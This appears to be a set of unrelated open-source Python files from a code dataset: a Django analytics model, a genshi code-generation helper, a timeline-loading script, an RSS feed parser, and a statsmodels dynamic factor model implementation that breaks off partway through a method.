fresher_hiring_pc = models.DecimalField(
max_digits=5,
decimal_places=2,
verbose_name="Fresher Hiring (%)",
default=95.0
)
need_for_experience_pc = models.DecimalField(
max_digits=5,
decimal_places=2,
verbose_name="Need for > 2 years experienced (% of headcount)",
default=45.0
)
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
verbose_name_plural = 'Talent Saturation'
def __unicode__(self):
"""
Returns object display name
"""
return "%d" % (self.year, )
@property
def quitters(self):
return int(self.headcount * self.attrition_pc / 100)
def series(self):
"Return talent saturation series"
years = []
records = TalentSaturation.objects.filter(year__lte=self.year) \
.order_by('year')
headcounts = [record.headcount for record in records]
years = [record.year for record in records] + \
range(self.year + 1, self.year + 8)
for i in range(7):
headcounts.append(int(headcounts[-1] * (1 + self.cagr_pc / 100)))
# difference between headcounts
hirings = map(
operator.sub, headcounts, [headcounts[0]] + headcounts[:-1],
)
quitters = [record.quitters for record in records]
for i in range(7):
quitters.append(int(quitters[-1] * (1 + self.cagr_pc / 100)))
gross_hiring = map(operator.add, quitters, hirings)
fresher_pcs = [record.fresher_hiring_pc for record in records] + \
[self.fresher_hiring_pc] * 7
fresher_hiring = map(
lambda g, f: int(g * f / 100),
gross_hiring, fresher_pcs
)
experience_need = map(
lambda record: int(
record.headcount * record.need_for_experience_pc / 100
),
records
)
experience_need += map(
lambda x: int(x * self.need_for_experience_pc / 100),
headcounts[-7:]
)
demand = map(
operator.sub,
experience_need, [experience_need[0]] + experience_need[:-1],
)
potential_supply = map(
lambda x: int(x * (self.fresher_hiring_pc / 100) ** 2),
[0, 0] + fresher_hiring[:-2]
)
return {
'years': years[3:],
'demand': demand[3:],
'potential_supply': potential_supply[3:],
}
django.contrib.admin.site.register(State)
django.contrib.admin.site.register(City)
django.contrib.admin.site.register(SupplyBase)
django.contrib.admin.site.register(DemandData)
django.contrib.admin.site.register(CompanyYearData)
django.contrib.admin.site.register(DiversityRatioLevel)
django.contrib.admin.site.register(DiversityRatioSubsector)
django.contrib.admin.site.register(GenderDiversity)
django.contrib.admin.site.register(ITSpend)
django.contrib.admin.site.register(RevenueSubsector)
django.contrib.admin.site.register(RevenueOccupation)
django.contrib.admin.site.register(RevenueTotal)
django.contrib.admin.site.register(TalentSaturation)
|
arpitprogressive/arpittest
|
apps/analytics/models.py
|
Python
|
bsd-3-clause
| 14,238
|
# Copyright (c) 2010, Florian Ludwig <dino@phidev.org>
# see LICENSE
"""Helpers for code generation based on genshi [0]
There are good code generator tools out there like cog [1].
But if you already use genshi in your project this module might
help you integrating code generation into your build and
deploy process using familar templating syntax.
If you're not using genshi you probably want to look at cog
and similar tools.
[0] http://genshi.edgewall.org/
[1] http://nedbatchelder.com/code/cog/
"""
import os
import StringIO
import copy
import logging
from genshi.template import TemplateLoader, MarkupTemplate, NewTextTemplate
import genshi.template.loader
class ActionscriptTemplate(NewTextTemplate):
"""Template for langauges with /* ... */ commments
Should work for JavaScript, Action Script, c,..."""
def __init__(self, *args, **kwargs):
kwargs['delims'] = ('/*%', '%*/', '/*###', '###*/')
NewTextTemplate.__init__(self, *args, **kwargs)
class ShellStyleTemplate(NewTextTemplate):
"""Template for languages with # commentars"""
def __init__(self, *args, **kwargs):
kwargs['delims'] = ('#%', '%#', '##*', '*##')
NewTextTemplate.__init__(self, *args, **kwargs)
def get_template(fpath):
"""returns template class for given filename"""
if fpath.endswith('.css') or fpath.endswith('.as') or fpath.endswith('.js'):
return ActionscriptTemplate
elif fpath.endswith('.py') or fpath.endswith('.wsgi'):
return ShellStyleTemplate
elif fpath.endswith('.mxml'):
return MarkupTemplate
else:
logging.warn('WARNING: don\'t know the file type of "%s"' % fpath)
return NewTextTemplate
def numbered_file(fpath, mode='r'):
"""Add filenumbers to every line as comment
Returns filelike object
"""
_fileobj = open(fpath, mode)
tmpl_cls = get_template(fpath)
if tmpl_cls == ActionscriptTemplate:
comment_start = '/*'
comment_end = '*/'
last_symbole = ';'
elif tmpl_cls == MarkupTemplate:
comment_start = '<!--'
comment_end = '-->'
last_symbole = '>'
else:
print 'WARNING: no line numbers for "%s"' % fpath
return _fileobj
data = []
in_comment = False
in_hidden_comment = False
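    # Added note: when a line falls inside a multi-line comment, the comment
    # is temporarily closed, the "Line: N" marker is appended, and the comment
    # is reopened (restoring the leading "!" of hidden genshi comments) so the
    # injected markers do not break the surrounding comment syntax.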
for number, line in enumerate(_fileobj.readlines()):
        line = line.rstrip()
if not in_comment and comment_start in line:
in_comment = True
s = line.find(comment_start) + len(comment_start)
if line[s:].lstrip().startswith('!'):
in_hidden_comment = True
if in_comment and comment_end in line:
in_comment = False
in_hidden_comment = False
if not line.endswith(last_symbole):
data.append(line)
continue
if in_comment:
line += comment_end
if line.rstrip().endswith('\\'):
            # if the line ends with a \ we might destroy the template syntax
continue
count_line = line.replace('\t', ' ')
white = 83 - len(count_line) if len(count_line) < 78 else 3
comment = comment_start + ' Line: %i ' + comment_end
if in_comment:
comment += comment_start
if in_hidden_comment:
comment += '!'
data.append(line
+ white*' '
+ (comment % (number+1)))
return StringIO.StringIO('\n'.join(data))
# monkey patch template loader
genshi.template.loader.open = numbered_file
class Handler(object):
"""Common handler for templates"""
def __init__(self, path, default_args={}):
if not isinstance(path, list):
path = [path]
self.loader = TemplateLoader(path)
self.default_args = default_args
def gen(self, src, dst, local_args={}):
print src, '->',
tmpl = self.loader.load(src, cls=get_template(src))
args = copy.copy(self.default_args)
args.update(local_args)
stream = tmpl.generate(**args)
print dst
data = stream.render()
# make sure we only touch file if we would change it
dst_data = open(dst).read() if os.path.exists(dst) else ''
if dst_data != data:
open(dst, 'w').write(data)
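# A minimal usage sketch (not part of the original module; the directory,
# file names and context values below are hypothetical).
if __name__ == '__main__':
    # Render templates/app.js -> build/app.js with a shared default context
    # plus per-file arguments; get_template() picks ActionscriptTemplate for
    # the .js extension, so /*% ... %*/ directives are interpreted.
    handler = Handler('templates', default_args={'version': '1.0'})
    handler.gen('app.js', 'build/app.js', {'debug': True})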
|
FlorianLudwig/python-yawp
|
yawp/template.py
|
Python
|
bsd-3-clause
| 4,325
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import *
import json
import bson.json_util as bju
import emission.core.get_database as edb
import argparse
import emission.core.wrapper.user as ecwu
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("timeline_filename",
help="the name of the file that contains the json representation of the timeline")
parser.add_argument("user_email",
help="specify the user email to load the data as")
parser.add_argument("-r", "--retain", action="store_true",
help="specify whether the entries should overwrite existing ones (default) or create new ones")
parser.add_argument("-v", "--verbose", type=int,
help="after how many lines we should print a status message.")
args = parser.parse_args()
fn = args.timeline_filename
print(fn)
print("Loading file " + fn)
tsdb = edb.get_timeseries_db()
user = ecwu.User.register(args.user_email)
override_uuid = user.uuid
print("After registration, %s -> %s" % (args.user_email, override_uuid))
entries = json.load(open(fn), object_hook = bju.object_hook)
for i, entry in enumerate(entries):
entry["user_id"] = override_uuid
if not args.retain:
del entry["_id"]
if args.verbose is not None and i % args.verbose == 0:
print("About to save %s" % entry)
tsdb.save(entry)
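# Example invocation (hypothetical file name and email, not from the original
# script):
#   python load_timeline_for_day_and_user.py /tmp/timeline_2016-08-01 test@example.com -v 100
# This registers test@example.com, rewrites each entry's user_id to the newly
# assigned UUID, and saves the entries into the timeseries database.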
|
sunil07t/e-mission-server
|
bin/debug/load_timeline_for_day_and_user.py
|
Python
|
bsd-3-clause
| 1,612
|
def extractSpearpointtranslationsHomeBlog(item):
'''
Parser for 'spearpointtranslations.home.blog'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('Record of the Missing Sect Master', 'Record of the Missing Sect Master', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
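# Hedged example (hypothetical item, not from the original module): an item
# titled 'Record of the Missing Sect Master - Chapter 12' carrying the
# 'Record of the Missing Sect Master' tag would be reported as chapter 12 of a
# translated release, while any title containing 'preview' returns None.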
|
fake-name/ReadableWebProxy
|
WebMirror/management/rss_parser_funcs/feed_parse_extractSpearpointtranslationsHomeBlog.py
|
Python
|
bsd-3-clause
| 692
|
"""
Dynamic factor model
Author: Chad Fulton
License: Simplified-BSD
"""
from __future__ import division, absolute_import, print_function
from warnings import warn
from statsmodels.compat.collections import OrderedDict
import numpy as np
import pandas as pd
from .kalman_filter import KalmanFilter, FilterResults
from .mlemodel import MLEModel, MLEResults, MLEResultsWrapper
from .tools import (
companion_matrix, diff, is_invertible,
constrain_stationary_univariate, unconstrain_stationary_univariate,
constrain_stationary_multivariate, unconstrain_stationary_multivariate
)
from scipy.linalg import solve_discrete_lyapunov
from statsmodels.multivariate.pca import PCA
from statsmodels.regression.linear_model import OLS
from statsmodels.tsa.vector_ar.var_model import VAR
from statsmodels.tools.tools import Bunch
from statsmodels.tools.data import _is_using_pandas
from statsmodels.tsa.tsatools import lagmat
from statsmodels.tools.decorators import cache_readonly
from statsmodels.tools.sm_exceptions import ValueWarning
import statsmodels.base.wrapper as wrap
class DynamicFactor(MLEModel):
r"""
Dynamic factor model
Parameters
----------
endog : array_like
The observed time-series process :math:`y`
exog : array_like, optional
Array of exogenous regressors for the observation equation, shaped
nobs x k_exog.
k_factors : int
The number of unobserved factors.
factor_order : int
The order of the vector autoregression followed by the factors.
error_cov_type : {'scalar', 'diagonal', 'unstructured'}, optional
The structure of the covariance matrix of the observation error term,
where "unstructured" puts no restrictions on the matrix, "diagonal"
requires it to be any diagonal matrix (uncorrelated errors), and
"scalar" requires it to be a scalar times the identity matrix. Default
is "diagonal".
error_order : int, optional
The order of the vector autoregression followed by the observation
error component. Default is None, corresponding to white noise errors.
error_var : boolean, optional
Whether or not to model the errors jointly via a vector autoregression,
rather than as individual autoregressions. Has no effect unless
`error_order` is set. Default is False.
enforce_stationarity : boolean, optional
Whether or not to transform the AR parameters to enforce stationarity
in the autoregressive component of the model. Default is True.
**kwargs
Keyword arguments may be used to provide default values for state space
matrices or for Kalman filtering options. See `Representation`, and
`KalmanFilter` for more details.
Attributes
----------
exog : array_like, optional
Array of exogenous regressors for the observation equation, shaped
nobs x k_exog.
k_factors : int
The number of unobserved factors.
factor_order : int
The order of the vector autoregression followed by the factors.
    error_cov_type : {'scalar', 'diagonal', 'unstructured'}
        The structure of the covariance matrix of the observation error term,
        where "unstructured" puts no restrictions on the matrix, "diagonal"
        requires it to be a diagonal matrix (uncorrelated errors), and
        "scalar" requires it to be a scalar times the identity matrix.
error_order : int
The order of the vector autoregression followed by the observation
error component.
error_var : boolean
Whether or not to model the errors jointly via a vector autoregression,
rather than as individual autoregressions. Has no effect unless
`error_order` is set.
enforce_stationarity : boolean, optional
Whether or not to transform the AR parameters to enforce stationarity
in the autoregressive component of the model. Default is True.
Notes
-----
The dynamic factor model considered here is in the so-called static form,
and is specified:
.. math::
y_t & = \Lambda f_t + B x_t + u_t \\
f_t & = A_1 f_{t-1} + \dots + A_p f_{t-p} + \eta_t \\
        u_t & = C_1 u_{t-1} + \dots + C_q u_{t-q} + \varepsilon_t
where there are `k_endog` observed series and `k_factors` unobserved
factors. Thus :math:`y_t` is a `k_endog` x 1 vector and :math:`f_t` is a
`k_factors` x 1 vector.
:math:`x_t` are optional exogenous vectors, shaped `k_exog` x 1.
:math:`\eta_t` and :math:`\varepsilon_t` are white noise error terms. In
order to identify the factors, :math:`Var(\eta_t) = I`. Denote
:math:`Var(\varepsilon_t) \equiv \Sigma`.
Options related to the unobserved factors:
- `k_factors`: this is the dimension of the vector :math:`f_t`, above.
To exclude factors completely, set `k_factors = 0`.
- `factor_order`: this is the number of lags to include in the factor
evolution equation, and corresponds to :math:`p`, above. To have static
factors, set `factor_order = 0`.
Options related to the observation error term :math:`u_t`:
- `error_order`: the number of lags to include in the error evolution
equation; corresponds to :math:`q`, above. To have white noise errors,
set `error_order = 0` (this is the default).
- `error_cov_type`: this controls the form of the covariance matrix
:math:`\Sigma`. If it is "dscalar", then :math:`\Sigma = \sigma^2 I`. If
it is "diagonal", then
:math:`\Sigma = \text{diag}(\sigma_1^2, \dots, \sigma_n^2)`. If it is
"unstructured", then :math:`\Sigma` is any valid variance / covariance
matrix (i.e. symmetric and positive definite).
- `error_var`: this controls whether or not the errors evolve jointly
according to a VAR(q), or individually according to separate AR(q)
processes. In terms of the formulation above, if `error_var = False`,
      then the matrices :math:`C_i` are diagonal, otherwise they are general
VAR matrices.
References
----------
.. [1] Lutkepohl, Helmut. 2007.
New Introduction to Multiple Time Series Analysis.
Berlin: Springer.
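    Examples
    --------
    A minimal usage sketch (illustrative only; ``data`` stands for an assumed
    (nobs x k_endog) array of observed series and is not part of the original
    docstring)::
        mod = DynamicFactor(data, k_factors=1, factor_order=2, error_order=1)
        res = mod.fit()
        print(res.summary())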
"""
def __init__(self, endog, k_factors, factor_order, exog=None,
error_order=0, error_var=False, error_cov_type='diagonal',
enforce_stationarity=True, **kwargs):
# Model properties
self.enforce_stationarity = enforce_stationarity
# Factor-related properties
self.k_factors = k_factors
self.factor_order = factor_order
# Error-related properties
self.error_order = error_order
self.error_var = error_var and error_order > 0
self.error_cov_type = error_cov_type
# Exogenous data
self.k_exog = 0
if exog is not None:
exog_is_using_pandas = _is_using_pandas(exog, None)
if not exog_is_using_pandas:
exog = np.asarray(exog)
# Make sure we have 2-dimensional array
if exog.ndim == 1:
if not exog_is_using_pandas:
exog = exog[:, None]
else:
exog = pd.DataFrame(exog)
self.k_exog = exog.shape[1]
# Note: at some point in the future might add state regression, as in
# SARIMAX.
self.mle_regression = self.k_exog > 0
# We need to have an array or pandas at this point
if not _is_using_pandas(endog, None):
endog = np.asanyarray(endog, order='C')
# Save some useful model orders, internally used
k_endog = endog.shape[1] if endog.ndim > 1 else 1
self._factor_order = max(1, self.factor_order) * self.k_factors
self._error_order = self.error_order * k_endog
# Calculate the number of states
k_states = self._factor_order
k_posdef = self.k_factors
if self.error_order > 0:
k_states += self._error_order
k_posdef += k_endog
if k_states == 0:
k_states = 1
k_posdef = 1
# Test for non-multivariate endog
if k_endog < 2:
raise ValueError('The dynamic factors model is only valid for'
' multivariate time series.')
# Test for too many factors
if self.k_factors >= k_endog:
raise ValueError('Number of factors must be less than the number'
' of endogenous variables.')
# Test for invalid error_cov_type
if self.error_cov_type not in ['scalar', 'diagonal', 'unstructured']:
raise ValueError('Invalid error covariance matrix type'
' specification.')
# By default, initialize as stationary
kwargs.setdefault('initialization', 'stationary')
# Initialize the state space model
super(DynamicFactor, self).__init__(
endog, exog=exog, k_states=k_states, k_posdef=k_posdef, **kwargs
)
# Initialize the components
self.parameters = OrderedDict()
self._initialize_loadings()
self._initialize_exog()
self._initialize_error_cov()
self._initialize_factor_transition()
self._initialize_error_transition()
self.k_params = sum(self.parameters.values())
# Cache parameter vector slices
def _slice(key, offset):
length = self.parameters[key]
param_slice = np.s_[offset:offset + length]
offset += length
return param_slice, offset
offset = 0
self._params_loadings, offset = _slice('factor_loadings', offset)
self._params_exog, offset = _slice('exog', offset)
self._params_error_cov, offset = _slice('error_cov', offset)
self._params_factor_transition, offset = (
_slice('factor_transition', offset))
self._params_error_transition, offset = (
_slice('error_transition', offset))
def _initialize_loadings(self):
# Initialize the parameters
self.parameters['factor_loadings'] = self.k_endog * self.k_factors
# Setup fixed components of state space matrices
if self.error_order > 0:
start = self._factor_order
end = self._factor_order + self.k_endog
self.ssm['design', :, start:end] = np.eye(self.k_endog)
# Setup indices of state space matrices
self._idx_loadings = np.s_['design', :, :self.k_factors]
def _initialize_exog(self):
# Initialize the parameters
self.parameters['exog'] = self.k_exog * self.k_endog
# If we have exog effects, then the obs intercept needs to be
# time-varying
if self.k_exog > 0:
self.ssm['obs_intercept'] = np.zeros((self.k_endog, self.nobs))
# Setup indices of state space matrices
self._idx_exog = np.s_['obs_intercept', :self.k_endog, :]
def _initialize_error_cov(self):
if self.error_cov_type == 'scalar':
self._initialize_error_cov_diagonal(scalar=True)
elif self.error_cov_type == 'diagonal':
self._initialize_error_cov_diagonal(scalar=False)
elif self.error_cov_type == 'unstructured':
self._initialize_error_cov_unstructured()
def _initialize_error_cov_diagonal(self, scalar=False):
# Initialize the parameters
self.parameters['error_cov'] = 1 if scalar else self.k_endog
# Setup fixed components of state space matrices
# Setup indices of state space matrices
k_endog = self.k_endog
k_factors = self.k_factors
idx = np.diag_indices(k_endog)
if self.error_order > 0:
matrix = 'state_cov'
idx = (idx[0] + k_factors, idx[1] + k_factors)
else:
matrix = 'obs_cov'
self._idx_error_cov = (matrix,) + idx
def _initialize_error_cov_unstructured(self):
# Initialize the parameters
k_endog = self.k_endog
self.parameters['error_cov'] = int(k_endog * (k_endog + 1) / 2)
# Setup fixed components of state space matrices
# Setup indices of state space matrices
self._idx_lower_error_cov = np.tril_indices(self.k_endog)
if self.error_order > 0:
start = self.k_factors
end = self.k_factors + self.k_endog
self._idx_error_cov = (
np.s_['state_cov', start:end, start:end])
else:
self._idx_error_cov = np.s_['obs_cov', :, :]
def _initialize_factor_transition(self):
order = self.factor_order * self.k_factors
k_factors = self.k_factors
# Initialize the parameters
self.parameters['factor_transition'] = (
self.factor_order * self.k_factors**2)
# Setup fixed components of state space matrices
# VAR(p) for factor transition
if self.k_factors > 0:
if self.factor_order > 0:
self.ssm['transition', k_factors:order, :order - k_factors] = (
np.eye(order - k_factors))
self.ssm['selection', :k_factors, :k_factors] = np.eye(k_factors)
# Identification requires constraining the state covariance to an
# identity matrix
self.ssm['state_cov', :k_factors, :k_factors] = np.eye(k_factors)
# Setup indices of state space matrices
self._idx_factor_transition = np.s_['transition', :k_factors, :order]
def _initialize_error_transition(self):
# Initialize the appropriate situation
if self.error_order == 0:
self._initialize_error_transition_white_noise()
else:
# Generic setup fixed components of state space matrices
# VAR(q) for error transition
# (in the individual AR case, we still have the VAR(q) companion
# matrix structure, but force the coefficient matrices to be
# diagonal)
k_endog = self.k_endog
k_factors = self.k_factors
_factor_order = self._factor_order
_error_order = self._error_order
_slice = np.s_['selection',
_factor_order:_factor_order + k_endog,
k_factors:k_factors + k_endog]
self.ssm[_slice] = np.eye(k_endog)
_slice = np.s_[
'transition',
_factor_order + k_endog:_factor_order + _error_order,
_factor_order:_factor_order + _error_order - k_endog]
self.ssm[_slice] = np.eye(_error_order - k_endog)
# Now specialized setups
if self.error_var:
self._initialize_error_transition_var()
else:
self._initialize_error_transition_individual()
def _initialize_error_transition_white_noise(self):
# Initialize the parameters
self.parameters['error_transition'] = 0
# No fixed components of state space matrices
# Setup indices of state space matrices (just an empty slice)
self._idx_error_transition = np.s_['transition', 0:0, 0:0]
def _initialize_error_transition_var(self):
k_endog = self.k_endog
_factor_order = self._factor_order
_error_order = self._error_order
# Initialize the parameters
self.parameters['error_transition'] = _error_order * k_endog
# Fixed components already setup above
# Setup indices of state space matrices
# Here we want to set all of the elements of the coefficient matrices,
# the same as in a VAR specification
self._idx_error_transition = np.s_[
'transition',
_factor_order:_factor_order + k_endog,
_factor_order:_factor_order + _error_order]
def _initialize_error_transition_individual(self):
k_endog = self.k_endog
_factor_order = self._factor_order
_error_order = self._error_order
# Initialize the parameters
self.parameters['error_transition'] = _error_order
# Fixed components already setup above
# Setup indices of state space matrices
# Here we want to set only the diagonal elements of the coefficient
# matrices, and we want to set them in order by equation, not by
# matrix (i.e. set the first element of the first matrix's diagonal,
# then set the first element of the second matrix's diagonal, then...)
# The basic setup is a tiled list of diagonal indices, one for each
# coefficient matrix
idx = np.tile(np.diag_indices(k_endog), self.error_order)
# Now we need to shift the rows down to the correct location
row_shift = self._factor_order
# And we need to shift the columns in an increasing way
col_inc = self._factor_order + np.repeat(
[i * k_endog for i in range(self.error_order)], k_endog)
idx[0] += row_shift
idx[1] += col_inc
# Make a copy (without the row shift) so that we can easily get the
# diagonal parameters back out of a generic coefficients matrix array
idx_diag = idx.copy()
idx_diag[0] -= row_shift
idx_diag[1] -= self._factor_order
idx_diag = idx_diag[:, np.lexsort((idx_diag[1], idx_diag[0]))]
self._idx_error_diag = (idx_diag[0], idx_diag[1])
        # Finally, we want to fill in the entries in the correct order, which
# is to say we want to fill in lexicographically, first by row then by
# column
idx = idx[:, np.lexsort((idx[1], idx[0]))]
self._idx_error_transition = np.s_['transition', idx[0], idx[1]]
def filter(self, params, **kwargs):
kwargs.setdefault('results_class', DynamicFactorResults)
kwargs.setdefault('results_wrapper_class', DynamicFactorResultsWrapper)
return super(DynamicFactor, self).filter(params, **kwargs)
def smooth(self, params, **kwargs):
kwargs.setdefault('results_class', DynamicFactorResults)
kwargs.setdefault('results_wrapper_class', DynamicFactorResultsWrapper)
return super(DynamicFactor, self).smooth(params, **kwargs)
@property
def start_params(self):
params = np.zeros(self.k_params, dtype=np.float64)
endog = self.endog.copy()
# 1. Factor loadings (estimated via PCA)
if self.k_factors > 0:
# Use principal components + OLS as starting values
res_pca = PCA(endog, ncomp=self.k_factors)
mod_ols = OLS(endog, res_pca.factors)
res_ols = mod_ols.fit()
            # Using OLS params for the loadings tends to give a higher
            # starting log-likelihood.
params[self._params_loadings] = res_ols.params.T.ravel()
# params[self._params_loadings] = res_pca.loadings.ravel()
            # However, using res_ols.resid tends to cause non-invertible
            # starting VAR coefficients for error VARs
# endog = res_ols.resid
endog = endog - np.dot(res_pca.factors, res_pca.loadings.T)
# 2. Exog (OLS on residuals)
if self.k_exog > 0:
mod_ols = OLS(endog, exog=self.exog)
res_ols = mod_ols.fit()
# In the form: beta.x1.y1, beta.x2.y1, beta.x1.y2, ...
params[self._params_exog] = res_ols.params.T.ravel()
endog = res_ols.resid
# 3. Factors (VAR on res_pca.factors)
stationary = True
if self.k_factors > 1 and self.factor_order > 0:
# 3a. VAR transition (OLS on factors estimated via PCA)
mod_factors = VAR(res_pca.factors)
res_factors = mod_factors.fit(maxlags=self.factor_order, ic=None,
trend='nc')
# Save the parameters
params[self._params_factor_transition] = (
res_factors.params.T.ravel())
# Test for stationarity
coefficient_matrices = (
params[self._params_factor_transition].reshape(
self.k_factors * self.factor_order, self.k_factors
).T
).reshape(self.k_factors, self.k_factors, self.factor_order).T
stationary = is_invertible([1] + list(-coefficient_matrices))
elif self.k_factors > 0 and self.factor_order > 0:
# 3b. AR transition
Y = res_pca.factors[self.factor_order:]
X = lagmat(res_pca.factors, self.factor_order, trim='both')
params_ar = np.linalg.pinv(X).dot(Y)
stationary = is_invertible(np.r_[1, -params_ar.squeeze()])
params[self._params_factor_transition] = params_ar[:, 0]
# Check for stationarity
if not stationary and self.enforce_stationarity:
raise ValueError('Non-stationary starting autoregressive'
' parameters found with `enforce_stationarity`'
' set to True.')
# 4. Errors
if self.error_order == 0:
error_params = []
if self.error_cov_type == 'scalar':
params[self._params_error_cov] = endog.var(axis=0).mean()
elif self.error_cov_type == 'diagonal':
params[self._params_error_cov] = endog.var(axis=0)
elif self.error_cov_type == 'unstructured':
cov_factor = np.diag(endog.std(axis=0))
params[self._params_error_cov] = (
cov_factor[self._idx_lower_error_cov].ravel())
else:
mod_errors = VAR(endog)
res_errors = mod_errors.fit(maxlags=self.error_order, ic=None,
trend='nc')
# Test for stationarity
coefficient_matrices = (
np.array(res_errors.params.T).ravel().reshape(
self.k_endog * self.error_order, self.k_endog
).T
).reshape(self.k_endog, self.k_endog, self.error_order).T
stationary = is_invertible([1] + list(-coefficient_matrices))
if not stationary and self.enforce_stationarity:
raise ValueError('Non-stationary starting error autoregressive'
' parameters found with'
' `enforce_stationarity` set to True.')
# Get the error autoregressive parameters
if self.error_var:
params[self._params_error_transition] = (
np.array(res_errors.params.T).ravel())
else:
# In the case of individual autoregressions, extract just the
# diagonal elements
params[self._params_error_transition] = (
res_errors.params.T[self._idx_error_diag])
# Get the error covariance parameters
if self.error_cov_type == 'scalar':
params[self._params_error_cov] = (
res_errors.sigma_u.diagonal().mean())
elif self.error_cov_type == 'diagonal':
params[self._params_error_cov] = res_errors.sigma_u.diagonal()
elif self.error_cov_type == 'unstructured':
try:
cov_factor = np.linalg.cholesky(res_errors.sigma_u)
except np.linalg.LinAlgError:
cov_factor = np.eye(res_errors.sigma_u.shape[0]) * (
res_errors.sigma_u.diagonal().mean()**0.5)
params[self._params_error_cov] = (
cov_factor[self._idx_lower_error_cov].ravel())
return params
@property
def param_names(self):
param_names = []
endog_names = self.endog_names
# 1. Factor loadings
param_names += [
'loading.f%d.%s' % (j+1, endog_names[i])
for i in range(self.k_endog)
for j in range(self.k_factors)
]
# 2. Exog
# Recall these are in the form: beta.x1.y1, beta.x2.y1, beta.x1.y2, ...
param_names += [
'beta.%s.%s' % (self.exog_names[j], endog_names[i])
for i in range(self.k_endog)
for j in range(self.k_exog)
]
# 3. Error covariances
if self.error_cov_type == 'scalar':
param_names += ['sigma2']
elif self.error_cov_type == 'diagonal':
param_names += [
'sigma2.%s' % endog_names[i]
for i in range(self.k_endog)
]
elif self.error_cov_type == 'unstructured':
param_names += [
('sqrt.var.%s' % endog_names[i] if i == j else
'sqrt.cov.%s.%s' % (endog_names[j], endog_names[i]))
for i in range(self.k_endog)
for j in range(i+1)
]
# 4. Factor transition VAR
param_names += [
'L%d.f%d.f%d' % (i+1, k+1, j+1)
for j in range(self.k_factors)
for i in range(self.factor_order)
for k in range(self.k_factors)
]
# 5. Error transition VAR
if self.error_var:
param_names += [
'L%d.e(%s).e(%s)' % (i+1, endog_names[k], endog_names[j])
for j in range(self.k_endog)
for i in range(self.error_order)
for k in range(self.k_endog)
]
else:
param_names += [
'L%d.e(%s).e(%s)' % (i+1, endog_names[j], endog_names[j])
for j in range(self.k_endog)
for i in range(self.error_order)
]
return param_names
def transform_params(self, unconstrained):
"""
Transform unconstrained parameters used by the optimizer to constrained
parameters used in likelihood evaluation
Parameters
----------
unconstrained : array_like
Array of unconstrained parameters used by the optimizer, to be
transformed.
Returns
-------
constrained : array_like
Array of constrained parameters which may be used in likelihood
            evaluation.
Notes
-----
Constrains the factor transition to be stationary and variances to be
positive.
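        For example (added illustration), an unconstrained variance parameter
        :math:`v` is mapped to the constrained value :math:`v^2`, and
        `untransform_params` inverts this with a square root.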
"""
unconstrained = np.array(unconstrained, ndmin=1)
dtype = unconstrained.dtype
constrained = np.zeros(unconstrained.shape, dtype=dtype)
# 1. Factor loadings
# The factor loadings do not need to be adjusted
constrained[self._params_loadings] = (
unconstrained[self._params_loadings])
# 2. Exog
# The regression coefficients do not need to be adjusted
constrained[self._params_exog] = (
unconstrained[self._params_exog])
# 3. Error covariances
# If we have variances, force them to be positive
if self.error_cov_type in ['scalar', 'diagonal']:
constrained[self._params_error_cov] = (
unconstrained[self._params_error_cov]**2)
# Otherwise, nothing needs to be done
elif self.error_cov_type == 'unstructured':
constrained[self._params_error_cov] = (
unconstrained[self._params_error_cov])
# 4. Factor transition VAR
# VAR transition: optionally force to be stationary
if self.enforce_stationarity and self.factor_order > 0:
# Transform the parameters
unconstrained_matrices = (
unconstrained[self._params_factor_transition].reshape(
self.k_factors, self._factor_order))
            # This is always an identity matrix, but because the transform is
            # done prior to update (where the ssm representation matrices
            # change), it may be complex
cov = self.ssm[
'state_cov', :self.k_factors, :self.k_factors].real
coefficient_matrices, variance = (
constrain_stationary_multivariate(unconstrained_matrices, cov))
constrained[self._params_factor_transition] = (
coefficient_matrices.ravel())
else:
constrained[self._params_factor_transition] = (
unconstrained[self._params_factor_transition])
# 5. Error transition VAR
# VAR transition: optionally force to be stationary
if self.enforce_stationarity and self.error_order > 0:
# Joint VAR specification
if self.error_var:
unconstrained_matrices = (
unconstrained[self._params_error_transition].reshape(
self.k_endog, self._error_order))
start = self.k_factors
end = self.k_factors + self.k_endog
cov = self.ssm['state_cov', start:end, start:end].real
coefficient_matrices, variance = (
constrain_stationary_multivariate(
unconstrained_matrices, cov))
constrained[self._params_error_transition] = (
coefficient_matrices.ravel())
# Separate AR specifications
else:
coefficients = (
unconstrained[self._params_error_transition].copy())
for i in range(self.k_endog):
start = i * self.error_order
end = (i + 1) * self.error_order
coefficients[start:end] = constrain_stationary_univariate(
coefficients[start:end])
constrained[self._params_error_transition] = coefficients
else:
constrained[self._params_error_transition] = (
unconstrained[self._params_error_transition])
return constrained
def untransform_params(self, constrained):
"""
Transform constrained parameters used in likelihood evaluation
to unconstrained parameters used by the optimizer.
Parameters
----------
constrained : array_like
            Array of constrained parameters used in likelihood evaluation, to be
transformed.
Returns
-------
unconstrained : array_like
Array of unconstrained parameters used by the optimizer.
"""
constrained = np.array(constrained, ndmin=1)
        dtype = constrained.dtype
unconstrained = np.zeros(constrained.shape, dtype=dtype)
# 1. Factor loadings
# The factor loadings do not need to be adjusted
unconstrained[self._params_loadings] = (
constrained[self._params_loadings])
# 2. Exog
# The regression coefficients do not need to be adjusted
unconstrained[self._params_exog] = (
constrained[self._params_exog])
# 3. Error covariances
# If we have variances, force them to be positive
if self.error_cov_type in ['scalar', 'diagonal']:
unconstrained[self._params_error_cov] = (
constrained[self._params_error_cov]**0.5)
# Otherwise, nothing needs to be done
elif self.error_cov_type == 'unstructured':
unconstrained[self._params_error_cov] = (
constrained[self._params_error_cov])
        # 4. Factor transition VAR
# VAR transition: optionally force to be stationary
if self.enforce_stationarity and self.factor_order > 0:
# Transform the parameters
constrained_matrices = (
constrained[self._params_factor_transition].reshape(
self.k_factors, self._factor_order))
cov = self.ssm[
'state_cov', :self.k_factors, :self.k_factors].real
coefficient_matrices, variance = (
unconstrain_stationary_multivariate(
constrained_matrices, cov))
unconstrained[self._params_factor_transition] = (
